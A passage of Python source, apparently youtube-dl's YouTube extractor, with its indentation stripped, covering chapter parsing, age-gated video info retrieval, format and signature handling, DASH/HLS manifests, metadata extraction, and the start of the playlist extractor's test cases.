return entries
@staticmethod
def _extract_url(webpage):
urls = YoutubeIE._extract_urls(webpage)
return urls[0] if urls else None
@classmethod
def extract_id(cls, url):
mobj = re.match(cls._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
video_id = mobj.group(2)
return video_id
def _extract_annotations(self, video_id):
url = 'https://www.youtube.com/annotations_invideo?features=1&legacy=1&video_id=%s' % video_id
return self._download_webpage(url, video_id, note='Searching for annotations.', errnote='Unable to download video annotations.')
@staticmethod
def _extract_chapters(description, duration):
if not description:
return None
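# Chapters are recognised as seek links in the description whose link text is
# a timestamp such as '12:34' or '1:02:03'; the rest of the line (minus the
# <a> element) becomes the chapter title below.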
chapter_lines = re.findall(
r'(?:^|<br\s*/>)([^<]*<a[^>]+onclick=["\']yt\.www\.watch\.player\.seekTo[^>]+>(\d{1,2}:\d{1,2}(?::\d{1,2})?)</a>[^>]*)(?=$|<br\s*/>)',
description)
if not chapter_lines:
return None
chapters = []
for next_num, (chapter_line, time_point) in enumerate(
chapter_lines, start=1):
start_time = parse_duration(time_point)
if start_time is None:
continue
if start_time > duration:
break
end_time = (duration if next_num == len(chapter_lines)
else parse_duration(chapter_lines[next_num][1]))
if end_time is None:
continue
if end_time > duration:
end_time = duration
if start_time > end_time:
break
chapter_title = re.sub(
r'<a[^>]+>[^<]+</a>', '', chapter_line).strip(' \t-')
chapter_title = re.sub(r'\s+', ' ', chapter_title)
chapters.append({
'start_time': start_time,
'end_time': end_time,
'title': chapter_title,
})
return chapters
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
proto = (
'http' if self._downloader.params.get('prefer_insecure', False)
else 'https')
start_time = None
end_time = None
parsed_url = compat_urllib_parse_urlparse(url)
for component in [parsed_url.fragment, parsed_url.query]:
query = compat_parse_qs(component)
if start_time is None and 't' in query:
start_time = parse_duration(query['t'][0])
if start_time is None and 'start' in query:
start_time = parse_duration(query['start'][0])
if end_time is None and 'end' in query:
end_time = parse_duration(query['end'][0])
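# For example, a 't=1m30s' query or fragment parameter should yield
# start_time = 90 (seconds).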
# Extract the original video URL from a redirecting URL (e.g. age verification) using the next_url parameter
mobj = re.search(self._NEXT_URL_RE, url)
if mobj:
url = proto + '://www.youtube.com/' + compat_urllib_parse_unquote(mobj.group(1)).lstrip('/')
video_id = self.extract_id(url)
# Get video webpage
url = proto + '://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999' % video_id
video_webpage = self._download_webpage(url, video_id)
# Attempt to extract SWF player URL
mobj = re.search(r'swfConfig.*?"(https?:\\/\\/.*?watch.*?-.*?\.swf)"', video_webpage)
if mobj is not None:
player_url = re.sub(r'\\(.)', r'\1', mobj.group(1))
else:
player_url = None
dash_mpds = []
def add_dash_mpd(video_info):
dash_mpd = video_info.get('dashmpd')
if dash_mpd and dash_mpd[0] not in dash_mpds:
dash_mpds.append(dash_mpd[0])
def add_dash_mpd_pr(pl_response):
dash_mpd = url_or_none(try_get(
pl_response, lambda x: x['streamingData']['dashManifestUrl'],
compat_str))
if dash_mpd and dash_mpd not in dash_mpds:
dash_mpds.append(dash_mpd)
is_live = None
view_count = None
def extract_view_count(v_info):
return int_or_none(try_get(v_info, lambda x: x['view_count'][0]))
player_response = {}
# Get video info
embed_webpage = None
if re.search(r'player-age-gate-content">', video_webpage) is not None:
age_gate = True
# We simulate access to the video from www.youtube.com/v/{video_id};
# this can be viewed without logging in to Youtube
url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(url, video_id, 'Downloading embed webpage')
data = compat_urllib_parse_urlencode({
'video_id': video_id,
'eurl': 'https://youtube.googleapis.com/v/' + video_id,
'sts': self._search_regex(
r'"sts"\s*:\s*(\d+)', embed_webpage, 'sts', default=''),
})
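# 'sts' is the player's signature timestamp; forwarding it to get_video_info
# should keep the returned stream signatures compatible with the player
# version downloaded above.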
video_info_url = proto + '://www.youtube.com/get_video_info?' + data
video_info_webpage = self._download_webpage(
video_info_url, video_id,
note='Refetching age-gated info webpage',
errnote='unable to download video info webpage')
video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(video_info)
else:
age_gate = False
video_info = None
sts = None
# Try looking directly into the video webpage
ytplayer_config = self._get_ytplayer_config(video_id, video_webpage)
if ytplayer_config:
args = ytplayer_config['args']
if args.get('url_encoded_fmt_stream_map') or args.get('hlsvp'):
# Convert to the same format returned by compat_parse_qs
video_info = dict((k, [v]) for k, v in args.items())
add_dash_mpd(video_info)
# Rental video is not rented but preview is available (e.g.
# https://www.youtube.com/watch?v=yYr8q0y5Jfg,
# https://github.com/ytdl-org/youtube-dl/issues/10532)
if not video_info and args.get('ypc_vid'):
return self.url_result(
args['ypc_vid'], YoutubeIE.ie_key(), video_id=args['ypc_vid'])
if args.get('livestream') == '1' or args.get('live_playback') == 1:
is_live = True
sts = ytplayer_config.get('sts')
if not player_response:
pl_response = str_or_none(args.get('player_response'))
if pl_response:
pl_response = self._parse_json(pl_response, video_id, fatal=False)
if isinstance(pl_response, dict):
player_response = pl_response
if not video_info or self._downloader.params.get('youtube_include_dash_manifest', True):
add_dash_mpd_pr(player_response)
# We also try looking in get_video_info since it may contain a different dashmpd
# URL that points to a DASH manifest with a possibly different itag set (some itags
# are missing from the DASH manifest pointed to by the webpage's dashmpd, some from
# the DASH manifest pointed to by get_video_info's dashmpd).
# The general idea is to take a union of the itags of both DASH manifests (for an
# example of a video with such 'manifest behavior' see https://github.com/ytdl-org/youtube-dl/issues/6093)
self.report_video_info_webpage_download(video_id)
for el in ('info', 'embedded', 'detailpage', 'vevo', ''):
query = {
'video_id': video_id,
'ps': 'default',
'eurl': '',
'gl': 'US',
'hl': 'en',
}
if el:
query['el'] = el
if sts:
query['sts'] = sts
video_info_webpage = self._download_webpage(
'%s://www.youtube.com/get_video_info' % proto,
video_id, note=False,
errnote='unable to download video info webpage',
fatal=False, query=query)
if not video_info_webpage:
continue
get_video_info = compat_parse_qs(video_info_webpage)
if not player_response:
pl_response = get_video_info.get('player_response', [None])[0]
if isinstance(pl_response, dict):
player_response = pl_response
add_dash_mpd_pr(player_response)
add_dash_mpd(get_video_info)
if view_count is None:
view_count = extract_view_count(get_video_info)
if not video_info:
video_info = get_video_info
if 'token' in get_video_info:
# Different get_video_info requests may report different results, e.g.
# some may report video unavailability, but some may serve it without
# any complaint (see https://github.com/ytdl-org/youtube-dl/issues/7362,
# the original webpage as well as el=info and el=embedded get_video_info
# requests report video unavailability due to geo restriction while
# el=detailpage succeeds and returns valid data). This is probably
# due to YouTube measures against IP ranges of hosting providers.
# Work around this by preferring the first successful video_info containing
# the token if no such video_info has been found yet.
if 'token' not in video_info:
video_info = get_video_info
break
def extract_unavailable_message():
return self._html_search_regex(
r'(?s)<h1[^>]+id="unavailable-message"[^>]*>(.+?)</h1>',
video_webpage, 'unavailable message', default=None)
if 'token' not in video_info:
if 'reason' in video_info:
if 'The uploader has not made this video available in your country.' in video_info['reason']:
regions_allowed = self._html_search_meta(
'regionsAllowed', video_webpage, default=None)
countries = regions_allowed.split(',') if regions_allowed else None
self.raise_geo_restricted(
msg=video_info['reason'][0], countries=countries)
reason = video_info['reason'][0]
if 'Invalid parameters' in reason:
unavailable_message = extract_unavailable_message()
if unavailable_message:
reason = unavailable_message
raise ExtractorError(
'YouTube said: %s' % reason,
expected=True, video_id=video_id)
else:
raise ExtractorError(
'"token" parameter not in video info for unknown reason',
video_id=video_id)
if video_info.get('license_info'):
raise ExtractorError('This video is DRM protected.', expected=True)
video_details = try_get(
player_response, lambda x: x['videoDetails'], dict) or {}
# title
if 'title' in video_info:
video_title = video_info['title'][0]
elif 'title' in player_response:
video_title = video_details['title']
else:
self._downloader.report_warning('Unable to extract video title')
video_title = '_'
# description
description_original = video_description = get_element_by_id("eow-description", video_webpage)
if video_description:
def replace_url(m):
redir_url = compat_urlparse.urljoin(url, m.group(1))
parsed_redir_url = compat_urllib_parse_urlparse(redir_url)
if re.search(r'^(?:www\.)?(?:youtube(?:-nocookie)?\.com|youtu\.be)$', parsed_redir_url.netloc) and parsed_redir_url.path == '/redirect':
qs = compat_parse_qs(parsed_redir_url.query)
q = qs.get('q')
if q and q[0]:
return q[0]
return redir_url
description_original = video_description = re.sub(r'''(?x)
<a\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
(?:title|href)="([^"]+)"\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
class="[^"]*"[^>]*>
[^<]+\.{3}\s*
</a>
''', replace_url, video_description)
video_description = clean_html(video_description)
else:
fd_mobj = re.search(r'<meta name="description" content="([^"]+)"', video_webpage)
if fd_mobj:
video_description = unescapeHTML(fd_mobj.group(1))
else:
video_description = ''
if not smuggled_data.get('force_singlefeed', False):
if not self._downloader.params.get('noplaylist'):
multifeed_metadata_list = try_get(
player_response,
lambda x: x['multicamera']['playerLegacyMulticameraRenderer']['metadataList'],
compat_str) or try_get(
video_info, lambda x: x['multifeed_metadata_list'][0], compat_str)
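# multifeed_metadata_list is a comma-separated list of URL-encoded query
# strings, one per camera feed; each entry carries at least 'id' and 'title'
# fields, which are used below to build one entry per feed.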
if multifeed_metadata_list:
entries = []
feed_ids = []
for feed in multifeed_metadata_list.split(','):
# Unquote should take place before split on comma (,) since textual
# fields may contain comma as well (see
# https://github.com/ytdl-org/youtube-dl/issues/8536)
feed_data = compat_parse_qs(compat_urllib_parse_unquote_plus(feed))
entries.append({
'_type': 'url_transparent',
'ie_key': 'Youtube',
'url': smuggle_url(
'%s://www.youtube.com/watch?v=%s' % (proto, feed_data['id'][0]),
{'force_singlefeed': True}),
'title': '%s (%s)' % (video_title, feed_data['title'][0]),
})
feed_ids.append(feed_data['id'][0])
self.to_screen(
'Downloading multifeed video (%s) - add --no-playlist to just download video %s'
% (', '.join(feed_ids), video_id))
return self.playlist_result(entries, video_id, video_title, video_description)
else:
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
if view_count is None:
view_count = extract_view_count(video_info)
if view_count is None and video_details:
view_count = int_or_none(video_details.get('viewCount'))
# Check for "rental" videos
if 'ypc_video_rental_bar_text' in video_info and 'author' not in video_info:
raise ExtractorError('"rental" videos not supported. See https://github.com/ytdl-org/youtube-dl/issues/359 for more information.', expected=True)
def _extract_filesize(media_url):
return int_or_none(self._search_regex(
r'\bclen[=/](\d+)', media_url, 'filesize', default=None))
if 'conn' in video_info and video_info['conn'][0].startswith('rtmp'):
self.report_rtmp_download()
formats = [{
'format_id': '_rtmp',
'protocol': 'rtmp',
'url': video_info['conn'][0],
'player_url': player_url,
}]
elif not is_live and (len(video_info.get('url_encoded_fmt_stream_map', [''])[0]) >= 1 or len(video_info.get('adaptive_fmts', [''])[0]) >= 1):
encoded_url_map = video_info.get('url_encoded_fmt_stream_map', [''])[0] + ',' + video_info.get('adaptive_fmts', [''])[0]
if 'rtmpe%3Dyes' in encoded_url_map:
raise ExtractorError('rtmpe downloads are not supported, see https://github.com/ytdl-org/youtube-dl/issues/343 for more information.', expected=True)
formats_spec = {}
fmt_list = video_info.get('fmt_list', [''])[0]
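# Each fmt_list entry looks roughly like '<itag>/<width>x<height>/...'; the
# first field identifies the format and the second its resolution.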
if fmt_list:
for fmt in fmt_list.split(','):
spec = fmt.split('/')
if len(spec) > 1:
width_height = spec[1].split('x')
if len(width_height) == 2:
formats_spec[spec[0]] = {
'resolution': spec[1],
'width': int_or_none(width_height[0]),
'height': int_or_none(width_height[1]),
}
q = qualities(['small', 'medium', 'hd720'])
streaming_formats = try_get(player_response, lambda x: x['streamingData']['formats'], list)
if streaming_formats:
for fmt in streaming_formats:
itag = str_or_none(fmt.get('itag'))
if not itag:
continue
quality = fmt.get('quality')
quality_label = fmt.get('qualityLabel') or quality
formats_spec[itag] = {
'asr': int_or_none(fmt.get('audioSampleRate')),
'filesize': int_or_none(fmt.get('contentLength')),
'format_note': quality_label,
'fps': int_or_none(fmt.get('fps')),
'height': int_or_none(fmt.get('height')),
'quality': q(quality),
# bitrate for itag 43 is always 2147483647
'tbr': float_or_none(fmt.get('averageBitrate') or fmt.get('bitrate'), 1000) if itag != '43' else None,
'width': int_or_none(fmt.get('width')),
}
formats = []
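# encoded_url_map is a comma-separated list of URL-encoded query strings;
# each entry carries at least 'itag' and 'url' plus either a ready-made
# 'sig' or an encrypted 's' signature that must be deciphered before use.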
for url_data_str in encoded_url_map.split(','):
url_data = compat_parse_qs(url_data_str)
if 'itag' not in url_data or 'url' not in url_data:
continue
stream_type = int_or_none(try_get(url_data, lambda x: x['stream_type'][0]))
# Unsupported FORMAT_STREAM_TYPE_OTF
if stream_type == 3:
continue
format_id = url_data['itag'][0]
url = url_data['url'][0]
if 's' in url_data or self._downloader.params.get('youtube_include_dash_manifest', True):
ASSETS_RE = r'"assets":.+?"js":\s*("[^"]+")'
jsplayer_url_json = self._search_regex(
ASSETS_RE,
embed_webpage if age_gate else video_webpage,
'JS player URL (1)', default=None)
if not jsplayer_url_json and not age_gate:
# We need the embed website after all
if embed_webpage is None:
embed_url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(
embed_url, video_id, 'Downloading embed webpage')
jsplayer_url_json = self._search_regex(
ASSETS_RE, embed_webpage, 'JS player URL')
player_url = json.loads(jsplayer_url_json)
if player_url is None:
player_url_json = self._search_regex(
r'ytplayer\.config.*?"url"\s*:\s*("[^"]+")',
video_webpage, 'age gate player URL')
player_url = json.loads(player_url_json)
if 'sig' in url_data:
url += '&signature=' + url_data['sig'][0]
elif 's' in url_data:
encrypted_sig = url_data['s'][0]
if self._downloader.params.get('verbose'):
if player_url is None:
player_version = 'unknown'
player_desc = 'unknown'
else:
if player_url.endswith('swf'):
player_version = self._search_regex(
r'-(.+?)(?:/watch_as3)?\.swf$', player_url,
'flash player', fatal=False)
player_desc = 'flash player %s' % player_version
else:
player_version = self._search_regex(
[r'html5player-([^/]+?)(?:/html5player(?:-new)?)?\.js',
r'(?:www|player(?:_ias)?)-([^/]+)(?:/[a-z]{2,3}_[A-Z]{2})?/base\.js'],
player_url,
'html5 player', fatal=False)
player_desc = 'html5 player %s' % player_version
parts_sizes = self._signature_cache_id(encrypted_sig)
self.to_screen('{%s} signature length %s, %s' %
(format_id, parts_sizes, player_desc))
signature = self._decrypt_signature(
encrypted_sig, video_id, player_url, age_gate)
url += '&signature=' + signature
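# 'ratebypass=yes' is believed to prevent the server from throttling the
# download to real-time playback speed.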
if 'ratebypass' not in url:
url += '&ratebypass=yes'
dct = {
'format_id': format_id,
'url': url,
'player_url': player_url,
}
if format_id in self._formats:
dct.update(self._formats[format_id])
if format_id in formats_spec:
dct.update(formats_spec[format_id])
# Some itags are not included in the DASH manifest, thus the corresponding formats will
# lack metadata (see https://github.com/ytdl-org/youtube-dl/pull/5993).
# Try to extract metadata from the url_encoded_fmt_stream_map entry.
mobj = re.search(r'^(?P<width>\d+)[xX](?P<height>\d+)$', url_data.get('size', [''])[0])
width, height = (int(mobj.group('width')), int(mobj.group('height'))) if mobj else (None, None)
filesize = int_or_none(url_data.get(
'clen', [None])[0]) or _extract_filesize(url)
quality = url_data.get('quality', [None])[0]
more_fields = {
'filesize': filesize,
'tbr': float_or_none(url_data.get('bitrate', [None])[0], 1000),
'width': width,
'height': height,
'fps': int_or_none(url_data.get('fps', [None])[0]),
'format_note': url_data.get('quality_label', [None])[0] or quality,
'quality': q(quality),
}
for key, value in more_fields.items():
if value:
dct[key] = value
type_ = url_data.get('type', [None])[0]
if type_:
type_split = type_.split(';')
kind_ext = type_split[0].split('/')
if len(kind_ext) == 2:
kind, _ = kind_ext
dct['ext'] = mimetype2ext(type_split[0])
if kind in ('audio', 'video'):
codecs = None
for mobj in re.finditer(
r'(?P<key>[a-zA-Z_-]+)=(?P<quote>["\']?)(?P<val>.+?)(?P=quote)(?:;|$)', type_):
if mobj.group('key') == 'codecs':
codecs = mobj.group('val')
break
if codecs:
dct.update(parse_codecs(codecs))
if dct.get('acodec') == 'none' or dct.get('vcodec') == 'none':
dct['downloader_options'] = {
# Youtube throttles chunks >~10M
'http_chunk_size': 10485760,
}
formats.append(dct)
else:
manifest_url = (
url_or_none(try_get(
player_response,
lambda x: x['streamingData']['hlsManifestUrl'],
compat_str)) or
url_or_none(try_get(
video_info, lambda x: x['hlsvp'][0], compat_str)))
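# Live streams (and a few other videos) expose no url_encoded_fmt_stream_map;
# instead an HLS manifest URL is taken from player_response or from the
# legacy hlsvp field and expanded into individual m3u8 formats below.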
if manifest_url:
formats = []
m3u8_formats = self._extract_m3u8_formats(
manifest_url, video_id, 'mp4', fatal=False)
for a_format in m3u8_formats:
itag = self._search_regex(
r'/itag/(\d+)/', a_format['url'], 'itag', default=None)
if itag:
a_format['format_id'] = itag
if itag in self._formats:
dct = self._formats[itag].copy()
dct.update(a_format)
a_format = dct
a_format['player_url'] = player_url
# Accept-Encoding header causes failures in live streams on Youtube and Youtube Gaming
a_format.setdefault('http_headers', {})['Youtubedl-no-compression'] = 'True'
formats.append(a_format)
else:
error_message = clean_html(video_info.get('reason', [None])[0])
if not error_message:
error_message = extract_unavailable_message()
if error_message:
raise ExtractorError(error_message, expected=True)
raise ExtractorError('no conn, hlsvp, hlsManifestUrl or url_encoded_fmt_stream_map information found in video info')
# uploader
video_uploader = try_get(
video_info, lambda x: x['author'][0],
compat_str) or str_or_none(video_details.get('author'))
if video_uploader:
video_uploader = compat_urllib_parse_unquote_plus(video_uploader)
else:
self._downloader.report_warning('unable to extract uploader name')
# uploader_id
video_uploader_id = None
video_uploader_url = None
mobj = re.search(
r'<link itemprop="url" href="(?P<uploader_url>https?://www\.youtube\.com/(?:user|channel)/(?P<uploader_id>[^"]+))">',
video_webpage)
if mobj is not None:
video_uploader_id = mobj.group('uploader_id')
video_uploader_url = mobj.group('uploader_url')
else:
self._downloader.report_warning('unable to extract uploader nickname')
channel_id = self._html_search_meta(
'channelId', video_webpage, 'channel id')
channel_url = 'http://www.youtube.com/channel/%s' % channel_id if channel_id else None
# thumbnail image
# We first try to get a high-quality image:
m_thumb = re.search(r'<span itemprop="thumbnail".*?href="(.*?)">',
video_webpage, re.DOTALL)
if m_thumb is not None:
video_thumbnail = m_thumb.group(1)
elif 'thumbnail_url' not in video_info:
self._downloader.report_warning('unable to extract video thumbnail')
video_thumbnail = None
else: # don't panic if we can't find it
video_thumbnail = compat_urllib_parse_unquote_plus(video_info['thumbnail_url'][0])
# upload date
upload_date = self._html_search_meta(
'datePublished', video_webpage, 'upload date', default=None)
if not upload_date:
upload_date = self._search_regex(
[r'(?s)id="eow-date.*?>(.*?)</span>',
r'(?:id="watch-uploader-info".*?>.*?|["\']simpleText["\']\s*:\s*["\'])(?:Published|Uploaded|Streamed live|Started) on (.+?)[<"\']'],
video_webpage, 'upload date', default=None)
upload_date = unified_strdate(upload_date)
video_license = self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*License\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li',
video_webpage, 'license', default=None)
m_music = re.search(
r'''(?x)
<h4[^>]+class="title"[^>]*>\s*Music\s*</h4>\s*
<ul[^>]*>\s*
<li>(?P<title>.+?)
by (?P<creator>.+?)
(?:
\(.+?\)|
<a[^>]*
(?:
\bhref=["\']/red[^>]*>| # drop possible
>\s*Listen ad-free with YouTube Red # YouTube Red ad
)
.*?
)?</li
''',
video_webpage)
if m_music:
video_alt_title = remove_quotes(unescapeHTML(m_music.group('title')))
video_creator = clean_html(m_music.group('creator'))
else:
video_alt_title = video_creator = None
def extract_meta(field):
return self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*%s\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li>\s*' % field,
video_webpage, field, default=None)
track = extract_meta('Song')
artist = extract_meta('Artist')
m_episode = re.search(
r'<div[^>]+id="watch7-headline"[^>]*>\s*<span[^>]*>.*?>(?P<series>[^<]+)</a></b>\s*S(?P<season>\d+)\s*•\s*E(?P<episode>\d+)</span>',
video_webpage)
if m_episode:
series = unescapeHTML(m_episode.group('series'))
season_number = int(m_episode.group('season'))
episode_number = int(m_episode.group('episode'))
else:
series = season_number = episode_number = None
m_cat_container = self._search_regex(
r'(?s)<h4[^>]*>\s*Category\s*</h4>\s*<ul[^>]*>(.*?)</ul>',
video_webpage, 'categories', default=None)
if m_cat_container:
category = self._html_search_regex(
r'(?s)<a[^<]+>(.*?)</a>', m_cat_container, 'category',
default=None)
video_categories = None if category is None else [category]
else:
video_categories = None
video_tags = [
unescapeHTML(m.group('content'))
for m in re.finditer(self._meta_regex('og:video:tag'), video_webpage)]
def _extract_count(count_name):
return str_to_int(self._search_regex(
r'-%s-button[^>]+><span[^>]+class="yt-uix-button-content"[^>]*>([\d,]+)</span>'
% re.escape(count_name),
video_webpage, count_name, default=None))
like_count = _extract_count('like')
dislike_count = _extract_count('dislike')
if view_count is None:
view_count = str_to_int(self._search_regex(
r'<[^>]+class=["\']watch-view-count[^>]+>\s*([\d,\s]+)', video_webpage,
'view count', default=None))
# subtitles
video_subtitles = self.extract_subtitles(video_id, video_webpage)
automatic_captions = self.extract_automatic_captions(video_id, video_webpage)
video_duration = try_get(
video_info, lambda x: int_or_none(x['length_seconds'][0]))
if not video_duration:
video_duration = int_or_none(video_details.get('lengthSeconds'))
if not video_duration:
video_duration = parse_duration(self._html_search_meta(
'duration', video_webpage, 'video duration'))
# annotations
video_annotations = None
if self._downloader.params.get('writeannotations', False):
video_annotations = self._extract_annotations(video_id)
chapters = self._extract_chapters(description_original, video_duration)
# Look for the DASH manifest
if self._downloader.params.get('youtube_include_dash_manifest', True):
dash_mpd_fatal = True
for mpd_url in dash_mpds:
dash_formats = {}
try:
def decrypt_sig(mobj):
s = mobj.group(1)
dec_s = self._decrypt_signature(s, video_id, player_url, age_gate)
return '/signature/%s' % dec_s
mpd_url = re.sub(r'/s/([a-fA-F0-9\.]+)', decrypt_sig, mpd_url)
for df in self._extract_mpd_formats(
mpd_url, video_id, fatal=dash_mpd_fatal,
formats_dict=self._formats):
if not df.get('filesize'):
df['filesize'] = _extract_filesize(df['url'])
# Do not overwrite DASH format found in some previous DASH manifest
if df['format_id'] not in dash_formats:
dash_formats[df['format_id']] = df
# Additional DASH manifests may end up in HTTP Error 403, therefore
# allow them to fail without a bug report message if some DASH manifest
# has already succeeded. This is a temporary workaround to reduce the
# burst of bug reports until we figure out the reason and whether it
# can be fixed at all.
dash_mpd_fatal = False
except (ExtractorError, KeyError) as e:
self.report_warning(
'Skipping DASH manifest: %r' % e, video_id)
if dash_formats:
# Remove the formats we found through non-DASH; they
# contain less info and it can be wrong, because we use
# fixed values (for example the resolution). See
# https://github.com/ytdl-org/youtube-dl/issues/5774 for an
# example.
formats = [f for f in formats if f['format_id'] not in dash_formats.keys()]
formats.extend(dash_formats.values())
# Check for malformed aspect ratio
stretched_m = re.search(
r'<meta\s+property="og:video:tag".*?content="yt:stretch=(?P<w>[0-9]+):(?P<h>[0-9]+)">',
video_webpage)
if stretched_m:
w = float(stretched_m.group('w'))
h = float(stretched_m.group('h'))
# yt:stretch may hold invalid ratio data (e.g. for Q39EVAstoRM ratio is 17:0).
# We will only process correct ratios.
if w > 0 and h > 0:
ratio = w / h
for f in formats:
if f.get('vcodec') != 'none':
f['stretched_ratio'] = ratio
self._sort_formats(formats)
self.mark_watched(video_id, video_info, player_response)
return {
'id': video_id,
'uploader': video_uploader,
'uploader_id': video_uploader_id,
'uploader_url': video_uploader_url,
'channel_id': channel_id,
'channel_url': channel_url,
'upload_date': upload_date,
'license': video_license,
'creator': video_creator or artist,
'title': video_title,
'alt_title': video_alt_title or track,
'thumbnail': video_thumbnail,
'description': video_description,
'categories': video_categories,
'tags': video_tags,
'subtitles': video_subtitles,
'automatic_captions': automatic_captions,
'duration': video_duration,
'age_limit': 18 if age_gate else 0,
'annotations': video_annotations,
'chapters': chapters,
'webpage_url': proto + '://www.youtube.com/watch?v=%s' % video_id,
'view_count': view_count,
'like_count': like_count,
'dislike_count': dislike_count,
'average_rating': float_or_none(video_info.get('avg_rating', [None])[0]),
'formats': formats,
'is_live': is_live,
'start_time': start_time,
'end_time': end_time,
'series': series,
'season_number': season_number,
'episode_number': episode_number,
'track': track,
'artist': artist,
}
class YoutubePlaylistIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com playlists'
_VALID_URL = r"""(?x)(?:
(?:https?://)?
(?:\w+\.)?
(?:
(?:
youtube\.com|
invidio\.us
)
/
(?:
(?:course|view_play_list|my_playlists|artist|playlist|watch|embed/(?:videoseries|[0-9A-Za-z_-]{11}))
\? (?:.*?[&;])*? (?:p|a|list)=
| p/
)|
youtu\.be/[0-9A-Za-z_-]{11}\?.*?\blist=
)
(
(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)?[0-9A-Za-z-_]{10,}
# Top tracks, they can also include dots
|(?:MC)[\w\.]*
)
.*
|
(%(playlist_id)s)
)""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_TEMPLATE_URL = 'https://www.youtube.com/playlist?list=%s'
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})&[^"]*?index=(?P<index>\d+)(?:[^>]+>(?P<title>[^<]+))?'
IE_NAME = 'youtube:playlist'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
'info_dict': {
'title': 'ytdl test PL',
'id': 'PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re',
},
'playlist_count': 3,
}, {
'url': 'https://www.youtube.com/playlist?list=PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'info_dict': {
'id': 'PLtPgu7CB4gbZDA7i_euNxn75ISqxwZPYx',
'title': 'YDL_Empty_List',
},
'playlist_count': 0,
'skip': 'This playlist is private',
}, {
'note': 'Playlist with deleted videos (#651). As a bonus, the video #51 is also twice in this list.',
'url': 'https://www.youtube.com/playlist?list=PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'info_dict': {
'title': '29C3: Not my department',
'id': 'PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
},
'playlist_count': 95,
}, {
'note': 'issue #673',
'url': 'PLBB231211A4F62143',
'info_dict': {
'title': '[OLD]Team Fortress 2 (Class-based LP)',
'id': 'PLBB231211A4F62143',
},
'playlist_mincount': 26,
}, {
'note': 'Large playlist',
'url': 'https://www.youtube.com/playlist?list=UUBABnxM4Ar9ten8Mdjj1j0Q',
'info_dict': {
'title': 'Uploads from Cauchemar',
'id': 'UUBABnxM4Ar9ten8Mdjj1j0Q',
},
'playlist_mincount': 799,
}, {
'url': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
'info_dict': {
'title': 'YDL_safe_search',
'id': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
},
'playlist_count': 2,
'skip': 'This playlist is private',
}, {
'note': 'embedded',
'url': 'https://www.youtube.com/embed/videoseries?list=PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'playlist_count': 4,
'info_dict': {
'title': 'JODA15',
'id': 'PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
}
}, {
'url': 'http://www.youtube.com/embed/_xDOZElKyNU?list=PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'playlist_mincount': 485,
'info_dict': {
'title': '2017 華語最新單曲 (2/24更新)',
'id': 'PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
}
}, {
'note': 'Embedded SWF player',
'url': 'https://www.youtube.com/p/YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ?hl=en_US&fs=1&rel=0',
'playlist_count': 4,
'info_dict': {
'title': 'JODA7',
'id': 'YN5VISEtHet5D4NEvfTd0zcgFk84NqFZ',
}
}, {
'note': 'Buggy playlist: the webpage has a "Load more" button but it doesn\'t have more videos',
'url': 'https://www.youtube.com/playlist?list=UUXw-G3eDE9trcvY2sBMM_aA',
'info_dict': {
'title': 'Uploads from Interstellar Movie',
'id': 'UUXw-G3eDE9trcvY2sBMM_aA',
},
'playlist_mincount': 21,
}, {
# Playlist URL that does not actually serve a playlist
'url': 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4',
'info_dict': {
'id': 'FqZTN594JQw',
'ext': 'webm',
'title': "Smiley's People 01 detective, Adventure Series, Action",
'uploader': 'STREEM',
'uploader_id': 'UCyPhqAZgwYWZfxElWVbVJng',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCyPhqAZgwYWZfxElWVbVJng',
'upload_date': '20150526',
'license': 'Standard YouTube License',
'description': 'md5:507cdcb5a49ac0da37a920ece610be80',
'categories': ['People & Blogs'],
'tags': list,
'view_count': int,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
'add_ie': [YoutubeIE.ie_key()],
}, {
'url': 'https://youtu.be/yeWKywCrFtk?list=PL2qgrgXsNUG5ig9cat4ohreBjYLAPC0J5',
'info_dict': {
'id': 'yeWKywCrFtk',
'ext': 'mp4',
'title': 'Small Scale Baler and Braiding Rugs',
'uploader': 'Backus-Page House Museum',
'uploader_id': 'backuspagemuseum',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/backuspagemuseum',
'upload_date': '20161008',
'license': 'Standard YouTube License',
'description': 'md5:800c0c78d5eb128500bffd4f0b4f2e8a',
'categories': ['Nonprofits & Activism'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'noplaylist': True,
'skip_download': True,
},
}, {
'url': 'https://youtu.be/uWyaPkt-VOI?list=PL9D9FC436B881BA21',
'only_matching': True,
}, {
